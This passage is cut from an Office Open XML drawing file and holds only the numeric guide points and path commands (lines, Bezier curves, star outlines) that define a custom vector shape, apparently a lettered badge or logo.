                <a:gd name="connsiteY257" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX258" fmla="*/ 37026 w 341498"/>
                <a:gd name="connsiteY258" fmla="*/ 201880 h 434997"/>
                <a:gd name="connsiteX259" fmla="*/ 52733 w 341498"/>
                <a:gd name="connsiteY259" fmla="*/ 201880 h 434997"/>
                <a:gd name="connsiteX260" fmla="*/ 52733 w 341498"/>
                <a:gd name="connsiteY260" fmla="*/ 196518 h 434997"/>
                <a:gd name="connsiteX261" fmla="*/ 37026 w 341498"/>
                <a:gd name="connsiteY261" fmla="*/ 196518 h 434997"/>
                <a:gd name="connsiteX262" fmla="*/ 37026 w 341498"/>
                <a:gd name="connsiteY262" fmla="*/ 186756 h 434997"/>
                <a:gd name="connsiteX263" fmla="*/ 54012 w 341498"/>
                <a:gd name="connsiteY263" fmla="*/ 186756 h 434997"/>
                <a:gd name="connsiteX264" fmla="*/ 54012 w 341498"/>
                <a:gd name="connsiteY264" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX265" fmla="*/ 100666 w 341498"/>
                <a:gd name="connsiteY265" fmla="*/ 180200 h 434997"/>
                <a:gd name="connsiteX266" fmla="*/ 85716 w 341498"/>
                <a:gd name="connsiteY266" fmla="*/ 199782 h 434997"/>
                <a:gd name="connsiteX267" fmla="*/ 100666 w 341498"/>
                <a:gd name="connsiteY267" fmla="*/ 219335 h 434997"/>
                <a:gd name="connsiteX268" fmla="*/ 113929 w 341498"/>
                <a:gd name="connsiteY268" fmla="*/ 204211 h 434997"/>
                <a:gd name="connsiteX269" fmla="*/ 108607 w 341498"/>
                <a:gd name="connsiteY269" fmla="*/ 204211 h 434997"/>
                <a:gd name="connsiteX270" fmla="*/ 100666 w 341498"/>
                <a:gd name="connsiteY270" fmla="*/ 214002 h 434997"/>
                <a:gd name="connsiteX271" fmla="*/ 91184 w 341498"/>
                <a:gd name="connsiteY271" fmla="*/ 199782 h 434997"/>
                <a:gd name="connsiteX272" fmla="*/ 100666 w 341498"/>
                <a:gd name="connsiteY272" fmla="*/ 185533 h 434997"/>
                <a:gd name="connsiteX273" fmla="*/ 108432 w 341498"/>
                <a:gd name="connsiteY273" fmla="*/ 192963 h 434997"/>
                <a:gd name="connsiteX274" fmla="*/ 113900 w 341498"/>
                <a:gd name="connsiteY274" fmla="*/ 192963 h 434997"/>
                <a:gd name="connsiteX275" fmla="*/ 113900 w 341498"/>
                <a:gd name="connsiteY275" fmla="*/ 192929 h 434997"/>
                <a:gd name="connsiteX276" fmla="*/ 100666 w 341498"/>
                <a:gd name="connsiteY276" fmla="*/ 180200 h 434997"/>
                <a:gd name="connsiteX277" fmla="*/ 268841 w 341498"/>
                <a:gd name="connsiteY277" fmla="*/ 180113 h 434997"/>
                <a:gd name="connsiteX278" fmla="*/ 253920 w 341498"/>
                <a:gd name="connsiteY278" fmla="*/ 199694 h 434997"/>
                <a:gd name="connsiteX279" fmla="*/ 268841 w 341498"/>
                <a:gd name="connsiteY279" fmla="*/ 219247 h 434997"/>
                <a:gd name="connsiteX280" fmla="*/ 282133 w 341498"/>
                <a:gd name="connsiteY280" fmla="*/ 204124 h 434997"/>
                <a:gd name="connsiteX281" fmla="*/ 276869 w 341498"/>
                <a:gd name="connsiteY281" fmla="*/ 204124 h 434997"/>
                <a:gd name="connsiteX282" fmla="*/ 268899 w 341498"/>
                <a:gd name="connsiteY282" fmla="*/ 213915 h 434997"/>
                <a:gd name="connsiteX283" fmla="*/ 268899 w 341498"/>
                <a:gd name="connsiteY283" fmla="*/ 214002 h 434997"/>
                <a:gd name="connsiteX284" fmla="*/ 259446 w 341498"/>
                <a:gd name="connsiteY284" fmla="*/ 199782 h 434997"/>
                <a:gd name="connsiteX285" fmla="*/ 268899 w 341498"/>
                <a:gd name="connsiteY285" fmla="*/ 185533 h 434997"/>
                <a:gd name="connsiteX286" fmla="*/ 276694 w 341498"/>
                <a:gd name="connsiteY286" fmla="*/ 192963 h 434997"/>
                <a:gd name="connsiteX287" fmla="*/ 282133 w 341498"/>
                <a:gd name="connsiteY287" fmla="*/ 192963 h 434997"/>
                <a:gd name="connsiteX288" fmla="*/ 282129 w 341498"/>
                <a:gd name="connsiteY288" fmla="*/ 192725 h 434997"/>
                <a:gd name="connsiteX289" fmla="*/ 268841 w 341498"/>
                <a:gd name="connsiteY289" fmla="*/ 180113 h 434997"/>
                <a:gd name="connsiteX290" fmla="*/ 195167 w 341498"/>
                <a:gd name="connsiteY290" fmla="*/ 116150 h 434997"/>
                <a:gd name="connsiteX291" fmla="*/ 195283 w 341498"/>
                <a:gd name="connsiteY291" fmla="*/ 129235 h 434997"/>
                <a:gd name="connsiteX292" fmla="*/ 206917 w 341498"/>
                <a:gd name="connsiteY292" fmla="*/ 129235 h 434997"/>
                <a:gd name="connsiteX293" fmla="*/ 208474 w 341498"/>
                <a:gd name="connsiteY293" fmla="*/ 129261 h 434997"/>
                <a:gd name="connsiteX294" fmla="*/ 213811 w 341498"/>
                <a:gd name="connsiteY294" fmla="*/ 122561 h 434997"/>
                <a:gd name="connsiteX295" fmla="*/ 206801 w 341498"/>
                <a:gd name="connsiteY295" fmla="*/ 116150 h 434997"/>
                <a:gd name="connsiteX296" fmla="*/ 188070 w 341498"/>
                <a:gd name="connsiteY296" fmla="*/ 110410 h 434997"/>
                <a:gd name="connsiteX297" fmla="*/ 207383 w 341498"/>
                <a:gd name="connsiteY297" fmla="*/ 110410 h 434997"/>
                <a:gd name="connsiteX298" fmla="*/ 220762 w 341498"/>
                <a:gd name="connsiteY298" fmla="*/ 121746 h 434997"/>
                <a:gd name="connsiteX299" fmla="*/ 214073 w 341498"/>
                <a:gd name="connsiteY299" fmla="*/ 132323 h 434997"/>
                <a:gd name="connsiteX300" fmla="*/ 220093 w 341498"/>
                <a:gd name="connsiteY300" fmla="*/ 141065 h 434997"/>
                <a:gd name="connsiteX301" fmla="*/ 222275 w 341498"/>
                <a:gd name="connsiteY301" fmla="*/ 152109 h 434997"/>
                <a:gd name="connsiteX302" fmla="*/ 214683 w 341498"/>
                <a:gd name="connsiteY302" fmla="*/ 152109 h 434997"/>
                <a:gd name="connsiteX303" fmla="*/ 213636 w 341498"/>
                <a:gd name="connsiteY303" fmla="*/ 145932 h 434997"/>
                <a:gd name="connsiteX304" fmla="*/ 205579 w 341498"/>
                <a:gd name="connsiteY304" fmla="*/ 134829 h 434997"/>
                <a:gd name="connsiteX305" fmla="*/ 195167 w 341498"/>
                <a:gd name="connsiteY305" fmla="*/ 134829 h 434997"/>
                <a:gd name="connsiteX306" fmla="*/ 195167 w 341498"/>
                <a:gd name="connsiteY306" fmla="*/ 152109 h 434997"/>
                <a:gd name="connsiteX307" fmla="*/ 188070 w 341498"/>
                <a:gd name="connsiteY307" fmla="*/ 152109 h 434997"/>
                <a:gd name="connsiteX308" fmla="*/ 272651 w 341498"/>
                <a:gd name="connsiteY308" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX309" fmla="*/ 280853 w 341498"/>
                <a:gd name="connsiteY309" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX310" fmla="*/ 291557 w 341498"/>
                <a:gd name="connsiteY310" fmla="*/ 128943 h 434997"/>
                <a:gd name="connsiteX311" fmla="*/ 302086 w 341498"/>
                <a:gd name="connsiteY311" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX312" fmla="*/ 310026 w 341498"/>
                <a:gd name="connsiteY312" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX313" fmla="*/ 294902 w 341498"/>
                <a:gd name="connsiteY313" fmla="*/ 135645 h 434997"/>
                <a:gd name="connsiteX314" fmla="*/ 294902 w 341498"/>
                <a:gd name="connsiteY314" fmla="*/ 152109 h 434997"/>
                <a:gd name="connsiteX315" fmla="*/ 287834 w 341498"/>
                <a:gd name="connsiteY315" fmla="*/ 152109 h 434997"/>
                <a:gd name="connsiteX316" fmla="*/ 287834 w 341498"/>
                <a:gd name="connsiteY316" fmla="*/ 135645 h 434997"/>
                <a:gd name="connsiteX317" fmla="*/ 239842 w 341498"/>
                <a:gd name="connsiteY317" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX318" fmla="*/ 272592 w 341498"/>
                <a:gd name="connsiteY318" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX319" fmla="*/ 272592 w 341498"/>
                <a:gd name="connsiteY319" fmla="*/ 116500 h 434997"/>
                <a:gd name="connsiteX320" fmla="*/ 259737 w 341498"/>
                <a:gd name="connsiteY320" fmla="*/ 116500 h 434997"/>
                <a:gd name="connsiteX321" fmla="*/ 259737 w 341498"/>
                <a:gd name="connsiteY321" fmla="*/ 152109 h 434997"/>
                <a:gd name="connsiteX322" fmla="*/ 252640 w 341498"/>
                <a:gd name="connsiteY322" fmla="*/ 152109 h 434997"/>
                <a:gd name="connsiteX323" fmla="*/ 252640 w 341498"/>
                <a:gd name="connsiteY323" fmla="*/ 116500 h 434997"/>
                <a:gd name="connsiteX324" fmla="*/ 239842 w 341498"/>
                <a:gd name="connsiteY324" fmla="*/ 116500 h 434997"/>
                <a:gd name="connsiteX325" fmla="*/ 227946 w 341498"/>
                <a:gd name="connsiteY325" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX326" fmla="*/ 235014 w 341498"/>
                <a:gd name="connsiteY326" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX327" fmla="*/ 235014 w 341498"/>
                <a:gd name="connsiteY327" fmla="*/ 152080 h 434997"/>
                <a:gd name="connsiteX328" fmla="*/ 227946 w 341498"/>
                <a:gd name="connsiteY328" fmla="*/ 152080 h 434997"/>
                <a:gd name="connsiteX329" fmla="*/ 146738 w 341498"/>
                <a:gd name="connsiteY329" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX330" fmla="*/ 153806 w 341498"/>
                <a:gd name="connsiteY330" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX331" fmla="*/ 153806 w 341498"/>
                <a:gd name="connsiteY331" fmla="*/ 134596 h 434997"/>
                <a:gd name="connsiteX332" fmla="*/ 163317 w 341498"/>
                <a:gd name="connsiteY332" fmla="*/ 146748 h 434997"/>
                <a:gd name="connsiteX333" fmla="*/ 172828 w 341498"/>
                <a:gd name="connsiteY333" fmla="*/ 134596 h 434997"/>
                <a:gd name="connsiteX334" fmla="*/ 172828 w 341498"/>
                <a:gd name="connsiteY334" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX335" fmla="*/ 179925 w 341498"/>
                <a:gd name="connsiteY335" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX336" fmla="*/ 179925 w 341498"/>
                <a:gd name="connsiteY336" fmla="*/ 137015 h 434997"/>
                <a:gd name="connsiteX337" fmla="*/ 163317 w 341498"/>
                <a:gd name="connsiteY337" fmla="*/ 153100 h 434997"/>
                <a:gd name="connsiteX338" fmla="*/ 146738 w 341498"/>
                <a:gd name="connsiteY338" fmla="*/ 136957 h 434997"/>
                <a:gd name="connsiteX339" fmla="*/ 70591 w 341498"/>
                <a:gd name="connsiteY339" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX340" fmla="*/ 99706 w 341498"/>
                <a:gd name="connsiteY340" fmla="*/ 110148 h 434997"/>
                <a:gd name="connsiteX341" fmla="*/ 99706 w 341498"/>
                <a:gd name="connsiteY341" fmla="*/ 116500 h 434997"/>
                <a:gd name="connsiteX342" fmla="*/ 77659 w 341498"/>
                <a:gd name="connsiteY342" fmla="*/ 116500 h 434997"/>
                <a:gd name="connsiteX343" fmla="*/ 77659 w 341498"/>
                <a:gd name="connsiteY343" fmla="*/ 127486 h 434997"/>
                <a:gd name="connsiteX344" fmla="*/ 98078 w 341498"/>
                <a:gd name="connsiteY344" fmla="*/ 127486 h 434997"/>
                <a:gd name="connsiteX345" fmla="*/ 98078 w 341498"/>
                <a:gd name="connsiteY345" fmla="*/ 133489 h 434997"/>
                <a:gd name="connsiteX346" fmla="*/ 77659 w 341498"/>
                <a:gd name="connsiteY346" fmla="*/ 133489 h 434997"/>
                <a:gd name="connsiteX347" fmla="*/ 77659 w 341498"/>
                <a:gd name="connsiteY347" fmla="*/ 145757 h 434997"/>
                <a:gd name="connsiteX348" fmla="*/ 100113 w 341498"/>
                <a:gd name="connsiteY348" fmla="*/ 145757 h 434997"/>
                <a:gd name="connsiteX349" fmla="*/ 100113 w 341498"/>
                <a:gd name="connsiteY349" fmla="*/ 152109 h 434997"/>
                <a:gd name="connsiteX350" fmla="*/ 70591 w 341498"/>
                <a:gd name="connsiteY350" fmla="*/ 152109 h 434997"/>
                <a:gd name="connsiteX351" fmla="*/ 123499 w 341498"/>
                <a:gd name="connsiteY351" fmla="*/ 109157 h 434997"/>
                <a:gd name="connsiteX352" fmla="*/ 140660 w 341498"/>
                <a:gd name="connsiteY352" fmla="*/ 123494 h 434997"/>
                <a:gd name="connsiteX353" fmla="*/ 133592 w 341498"/>
                <a:gd name="connsiteY353" fmla="*/ 123494 h 434997"/>
                <a:gd name="connsiteX354" fmla="*/ 123499 w 341498"/>
                <a:gd name="connsiteY354" fmla="*/ 115160 h 434997"/>
                <a:gd name="connsiteX355" fmla="*/ 111196 w 341498"/>
                <a:gd name="connsiteY355" fmla="*/ 131129 h 434997"/>
                <a:gd name="connsiteX356" fmla="*/ 123499 w 341498"/>
                <a:gd name="connsiteY356" fmla="*/ 147097 h 434997"/>
                <a:gd name="connsiteX357" fmla="*/ 133796 w 341498"/>
                <a:gd name="connsiteY357" fmla="*/ 136112 h 434997"/>
                <a:gd name="connsiteX358" fmla="*/ 140718 w 341498"/>
                <a:gd name="connsiteY358" fmla="*/ 136112 h 434997"/>
                <a:gd name="connsiteX359" fmla="*/ 140714 w 341498"/>
                <a:gd name="connsiteY359" fmla="*/ 136612 h 434997"/>
                <a:gd name="connsiteX360" fmla="*/ 123499 w 341498"/>
                <a:gd name="connsiteY360" fmla="*/ 153100 h 434997"/>
                <a:gd name="connsiteX361" fmla="*/ 104128 w 341498"/>
                <a:gd name="connsiteY361" fmla="*/ 131129 h 434997"/>
                <a:gd name="connsiteX362" fmla="*/ 123499 w 341498"/>
                <a:gd name="connsiteY362" fmla="*/ 109157 h 434997"/>
                <a:gd name="connsiteX363" fmla="*/ 47788 w 341498"/>
                <a:gd name="connsiteY363" fmla="*/ 109157 h 434997"/>
                <a:gd name="connsiteX364" fmla="*/ 63320 w 341498"/>
                <a:gd name="connsiteY364" fmla="*/ 122561 h 434997"/>
                <a:gd name="connsiteX365" fmla="*/ 56223 w 341498"/>
                <a:gd name="connsiteY365" fmla="*/ 122561 h 434997"/>
                <a:gd name="connsiteX366" fmla="*/ 47497 w 341498"/>
                <a:gd name="connsiteY366" fmla="*/ 115160 h 434997"/>
                <a:gd name="connsiteX367" fmla="*/ 40080 w 341498"/>
                <a:gd name="connsiteY367" fmla="*/ 120609 h 434997"/>
                <a:gd name="connsiteX368" fmla="*/ 44909 w 341498"/>
                <a:gd name="connsiteY368" fmla="*/ 126029 h 434997"/>
                <a:gd name="connsiteX369" fmla="*/ 56543 w 341498"/>
                <a:gd name="connsiteY369" fmla="*/ 129235 h 434997"/>
                <a:gd name="connsiteX370" fmla="*/ 64425 w 341498"/>
                <a:gd name="connsiteY370" fmla="*/ 139929 h 434997"/>
                <a:gd name="connsiteX371" fmla="*/ 48341 w 341498"/>
                <a:gd name="connsiteY371" fmla="*/ 153100 h 434997"/>
                <a:gd name="connsiteX372" fmla="*/ 31442 w 341498"/>
                <a:gd name="connsiteY372" fmla="*/ 138122 h 434997"/>
                <a:gd name="connsiteX373" fmla="*/ 38568 w 341498"/>
                <a:gd name="connsiteY373" fmla="*/ 138122 h 434997"/>
                <a:gd name="connsiteX374" fmla="*/ 48806 w 341498"/>
                <a:gd name="connsiteY374" fmla="*/ 147097 h 434997"/>
                <a:gd name="connsiteX375" fmla="*/ 57357 w 341498"/>
                <a:gd name="connsiteY375" fmla="*/ 140774 h 434997"/>
                <a:gd name="connsiteX376" fmla="*/ 54012 w 341498"/>
                <a:gd name="connsiteY376" fmla="*/ 135587 h 434997"/>
                <a:gd name="connsiteX377" fmla="*/ 41971 w 341498"/>
                <a:gd name="connsiteY377" fmla="*/ 132119 h 434997"/>
                <a:gd name="connsiteX378" fmla="*/ 33013 w 341498"/>
                <a:gd name="connsiteY378" fmla="*/ 121483 h 434997"/>
                <a:gd name="connsiteX379" fmla="*/ 47788 w 341498"/>
                <a:gd name="connsiteY379" fmla="*/ 109157 h 434997"/>
                <a:gd name="connsiteX380" fmla="*/ 159042 w 341498"/>
                <a:gd name="connsiteY380" fmla="*/ 68245 h 434997"/>
                <a:gd name="connsiteX381" fmla="*/ 159042 w 341498"/>
                <a:gd name="connsiteY381" fmla="*/ 88323 h 434997"/>
                <a:gd name="connsiteX382" fmla="*/ 177424 w 341498"/>
                <a:gd name="connsiteY382" fmla="*/ 88323 h 434997"/>
                <a:gd name="connsiteX383" fmla="*/ 179392 w 341498"/>
                <a:gd name="connsiteY383" fmla="*/ 88311 h 434997"/>
                <a:gd name="connsiteX384" fmla="*/ 187459 w 341498"/>
                <a:gd name="connsiteY384" fmla="*/ 78153 h 434997"/>
                <a:gd name="connsiteX385" fmla="*/ 187445 w 341498"/>
                <a:gd name="connsiteY385" fmla="*/ 76278 h 434997"/>
                <a:gd name="connsiteX386" fmla="*/ 177424 w 341498"/>
                <a:gd name="connsiteY386" fmla="*/ 68245 h 434997"/>
                <a:gd name="connsiteX387" fmla="*/ 270499 w 341498"/>
                <a:gd name="connsiteY387" fmla="*/ 42428 h 434997"/>
                <a:gd name="connsiteX388" fmla="*/ 270499 w 341498"/>
                <a:gd name="connsiteY388" fmla="*/ 62505 h 434997"/>
                <a:gd name="connsiteX389" fmla="*/ 287659 w 341498"/>
                <a:gd name="connsiteY389" fmla="*/ 62505 h 434997"/>
                <a:gd name="connsiteX390" fmla="*/ 297868 w 341498"/>
                <a:gd name="connsiteY390" fmla="*/ 52219 h 434997"/>
                <a:gd name="connsiteX391" fmla="*/ 287485 w 341498"/>
                <a:gd name="connsiteY391" fmla="*/ 42428 h 434997"/>
                <a:gd name="connsiteX392" fmla="*/ 159042 w 341498"/>
                <a:gd name="connsiteY392" fmla="*/ 42427 h 434997"/>
                <a:gd name="connsiteX393" fmla="*/ 159042 w 341498"/>
                <a:gd name="connsiteY393" fmla="*/ 60086 h 434997"/>
                <a:gd name="connsiteX394" fmla="*/ 176086 w 341498"/>
                <a:gd name="connsiteY394" fmla="*/ 60086 h 434997"/>
                <a:gd name="connsiteX395" fmla="*/ 177232 w 341498"/>
                <a:gd name="connsiteY395" fmla="*/ 60075 h 434997"/>
                <a:gd name="connsiteX396" fmla="*/ 184812 w 341498"/>
                <a:gd name="connsiteY396" fmla="*/ 51169 h 434997"/>
                <a:gd name="connsiteX397" fmla="*/ 176086 w 341498"/>
                <a:gd name="connsiteY397" fmla="*/ 42427 h 434997"/>
                <a:gd name="connsiteX398" fmla="*/ 207470 w 341498"/>
                <a:gd name="connsiteY398" fmla="*/ 33248 h 434997"/>
                <a:gd name="connsiteX399" fmla="*/ 250459 w 341498"/>
                <a:gd name="connsiteY399" fmla="*/ 33248 h 434997"/>
                <a:gd name="connsiteX400" fmla="*/ 250459 w 341498"/>
                <a:gd name="connsiteY400" fmla="*/ 42952 h 434997"/>
                <a:gd name="connsiteX401" fmla="*/ 217912 w 341498"/>
                <a:gd name="connsiteY401" fmla="*/ 42952 h 434997"/>
                <a:gd name="connsiteX402" fmla="*/ 217912 w 341498"/>
                <a:gd name="connsiteY402" fmla="*/ 59794 h 434997"/>
                <a:gd name="connsiteX403" fmla="*/ 248045 w 341498"/>
                <a:gd name="connsiteY403" fmla="*/ 59794 h 434997"/>
                <a:gd name="connsiteX404" fmla="*/ 248045 w 341498"/>
                <a:gd name="connsiteY404" fmla="*/ 68974 h 434997"/>
                <a:gd name="connsiteX405" fmla="*/ 217912 w 341498"/>
                <a:gd name="connsiteY405" fmla="*/ 68974 h 434997"/>
                <a:gd name="connsiteX406" fmla="*/ 217912 w 341498"/>
                <a:gd name="connsiteY406" fmla="*/ 87798 h 434997"/>
                <a:gd name="connsiteX407" fmla="*/ 251041 w 341498"/>
                <a:gd name="connsiteY407" fmla="*/ 87798 h 434997"/>
                <a:gd name="connsiteX408" fmla="*/ 251041 w 341498"/>
                <a:gd name="connsiteY408" fmla="*/ 97502 h 434997"/>
                <a:gd name="connsiteX409" fmla="*/ 207470 w 341498"/>
                <a:gd name="connsiteY409" fmla="*/ 97502 h 434997"/>
                <a:gd name="connsiteX410" fmla="*/ 148513 w 341498"/>
                <a:gd name="connsiteY410" fmla="*/ 33248 h 434997"/>
                <a:gd name="connsiteX411" fmla="*/ 177599 w 341498"/>
                <a:gd name="connsiteY411" fmla="*/ 33248 h 434997"/>
                <a:gd name="connsiteX412" fmla="*/ 195341 w 341498"/>
                <a:gd name="connsiteY412" fmla="*/ 49158 h 434997"/>
                <a:gd name="connsiteX413" fmla="*/ 186790 w 341498"/>
                <a:gd name="connsiteY413" fmla="*/ 62854 h 434997"/>
                <a:gd name="connsiteX414" fmla="*/ 186790 w 341498"/>
                <a:gd name="connsiteY414" fmla="*/ 63029 h 434997"/>
                <a:gd name="connsiteX415" fmla="*/ 198017 w 341498"/>
                <a:gd name="connsiteY415" fmla="*/ 79610 h 434997"/>
                <a:gd name="connsiteX416" fmla="*/ 175941 w 341498"/>
                <a:gd name="connsiteY416" fmla="*/ 97502 h 434997"/>
                <a:gd name="connsiteX417" fmla="*/ 148513 w 341498"/>
                <a:gd name="connsiteY417" fmla="*/ 97502 h 434997"/>
                <a:gd name="connsiteX418" fmla="*/ 87520 w 341498"/>
                <a:gd name="connsiteY418" fmla="*/ 33248 h 434997"/>
                <a:gd name="connsiteX419" fmla="*/ 99649 w 341498"/>
                <a:gd name="connsiteY419" fmla="*/ 33248 h 434997"/>
                <a:gd name="connsiteX420" fmla="*/ 115443 w 341498"/>
                <a:gd name="connsiteY420" fmla="*/ 62038 h 434997"/>
                <a:gd name="connsiteX421" fmla="*/ 131004 w 341498"/>
                <a:gd name="connsiteY421" fmla="*/ 33248 h 434997"/>
                <a:gd name="connsiteX422" fmla="*/ 142726 w 341498"/>
                <a:gd name="connsiteY422" fmla="*/ 33248 h 434997"/>
                <a:gd name="connsiteX423" fmla="*/ 120388 w 341498"/>
                <a:gd name="connsiteY423" fmla="*/ 72296 h 434997"/>
                <a:gd name="connsiteX424" fmla="*/ 120388 w 341498"/>
                <a:gd name="connsiteY424" fmla="*/ 97502 h 434997"/>
                <a:gd name="connsiteX425" fmla="*/ 109945 w 341498"/>
                <a:gd name="connsiteY425" fmla="*/ 97502 h 434997"/>
                <a:gd name="connsiteX426" fmla="*/ 109945 w 341498"/>
                <a:gd name="connsiteY426" fmla="*/ 72296 h 434997"/>
                <a:gd name="connsiteX427" fmla="*/ 260173 w 341498"/>
                <a:gd name="connsiteY427" fmla="*/ 33132 h 434997"/>
                <a:gd name="connsiteX428" fmla="*/ 288677 w 341498"/>
                <a:gd name="connsiteY428" fmla="*/ 33132 h 434997"/>
                <a:gd name="connsiteX429" fmla="*/ 308426 w 341498"/>
                <a:gd name="connsiteY429" fmla="*/ 50616 h 434997"/>
                <a:gd name="connsiteX430" fmla="*/ 298566 w 341498"/>
                <a:gd name="connsiteY430" fmla="*/ 66818 h 434997"/>
                <a:gd name="connsiteX431" fmla="*/ 298566 w 341498"/>
                <a:gd name="connsiteY431" fmla="*/ 66993 h 434997"/>
                <a:gd name="connsiteX432" fmla="*/ 307292 w 341498"/>
                <a:gd name="connsiteY432" fmla="*/ 80601 h 434997"/>
                <a:gd name="connsiteX433" fmla="*/ 310579 w 341498"/>
                <a:gd name="connsiteY433" fmla="*/ 97502 h 434997"/>
                <a:gd name="connsiteX434" fmla="*/ 299352 w 341498"/>
                <a:gd name="connsiteY434" fmla="*/ 97502 h 434997"/>
                <a:gd name="connsiteX435" fmla="*/ 297781 w 341498"/>
                <a:gd name="connsiteY435" fmla="*/ 88061 h 434997"/>
                <a:gd name="connsiteX436" fmla="*/ 285885 w 341498"/>
                <a:gd name="connsiteY436" fmla="*/ 71043 h 434997"/>
                <a:gd name="connsiteX437" fmla="*/ 270499 w 341498"/>
                <a:gd name="connsiteY437" fmla="*/ 71043 h 434997"/>
                <a:gd name="connsiteX438" fmla="*/ 270499 w 341498"/>
                <a:gd name="connsiteY438" fmla="*/ 97502 h 434997"/>
                <a:gd name="connsiteX439" fmla="*/ 260173 w 341498"/>
                <a:gd name="connsiteY439" fmla="*/ 97502 h 434997"/>
                <a:gd name="connsiteX440" fmla="*/ 59394 w 341498"/>
                <a:gd name="connsiteY440" fmla="*/ 31617 h 434997"/>
                <a:gd name="connsiteX441" fmla="*/ 84757 w 341498"/>
                <a:gd name="connsiteY441" fmla="*/ 53588 h 434997"/>
                <a:gd name="connsiteX442" fmla="*/ 74286 w 341498"/>
                <a:gd name="connsiteY442" fmla="*/ 53588 h 434997"/>
                <a:gd name="connsiteX443" fmla="*/ 59394 w 341498"/>
                <a:gd name="connsiteY443" fmla="*/ 40796 h 434997"/>
                <a:gd name="connsiteX444" fmla="*/ 41244 w 341498"/>
                <a:gd name="connsiteY444" fmla="*/ 65390 h 434997"/>
                <a:gd name="connsiteX445" fmla="*/ 59394 w 341498"/>
                <a:gd name="connsiteY445" fmla="*/ 89896 h 434997"/>
                <a:gd name="connsiteX446" fmla="*/ 74635 w 341498"/>
                <a:gd name="connsiteY446" fmla="*/ 73053 h 434997"/>
                <a:gd name="connsiteX447" fmla="*/ 84844 w 341498"/>
                <a:gd name="connsiteY447" fmla="*/ 73053 h 434997"/>
                <a:gd name="connsiteX448" fmla="*/ 59394 w 341498"/>
                <a:gd name="connsiteY448" fmla="*/ 99075 h 434997"/>
                <a:gd name="connsiteX449" fmla="*/ 30802 w 341498"/>
                <a:gd name="connsiteY449" fmla="*/ 65273 h 434997"/>
                <a:gd name="connsiteX450" fmla="*/ 59394 w 341498"/>
                <a:gd name="connsiteY450" fmla="*/ 31617 h 434997"/>
                <a:gd name="connsiteX451" fmla="*/ 3345 w 341498"/>
                <a:gd name="connsiteY451" fmla="*/ 3351 h 434997"/>
                <a:gd name="connsiteX452" fmla="*/ 3345 w 341498"/>
                <a:gd name="connsiteY452" fmla="*/ 164377 h 434997"/>
                <a:gd name="connsiteX453" fmla="*/ 338153 w 341498"/>
                <a:gd name="connsiteY453" fmla="*/ 164377 h 434997"/>
                <a:gd name="connsiteX454" fmla="*/ 338153 w 341498"/>
                <a:gd name="connsiteY454" fmla="*/ 3351 h 434997"/>
                <a:gd name="connsiteX455" fmla="*/ 0 w 341498"/>
                <a:gd name="connsiteY455" fmla="*/ 0 h 434997"/>
                <a:gd name="connsiteX456" fmla="*/ 341498 w 341498"/>
                <a:gd name="connsiteY456" fmla="*/ 0 h 434997"/>
                <a:gd name="connsiteX457" fmla="*/ 341498 w 341498"/>
                <a:gd name="connsiteY457" fmla="*/ 401021 h 434997"/>
                <a:gd name="connsiteX458" fmla="*/ 207528 w 341498"/>
                <a:gd name="connsiteY458" fmla="*/ 430977 h 434997"/>
                <a:gd name="connsiteX459" fmla="*/ 133940 w 341498"/>
                <a:gd name="connsiteY459" fmla="*/ 430977 h 434997"/>
                <a:gd name="connsiteX460" fmla="*/ 0 w 341498"/>
                <a:gd name="connsiteY460" fmla="*/ 401021 h 43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</a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="341498" h="434997">
                  <a:moveTo>
                    <a:pt x="240715" y="329512"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="240715" y="339886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250139" y="339886"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="253978" y="339886"/>
                    <a:pt x="255956" y="338079"/>
                    <a:pt x="255956" y="334582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255956" y="330357"/>
                    <a:pt x="253047" y="329512"/>
                    <a:pt x="250139" y="329512"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="307438" y="328113"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="311277" y="337496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321370" y="338254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313662" y="344810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316047" y="354660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307438" y="349327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298829" y="354660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301243" y="344810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293535" y="338254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303599" y="337496"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="34030" y="328113"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="37869" y="337496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47962" y="338254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40254" y="344810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42639" y="354660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34030" y="349327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25421" y="354660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27806" y="344810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20098" y="338254"/>
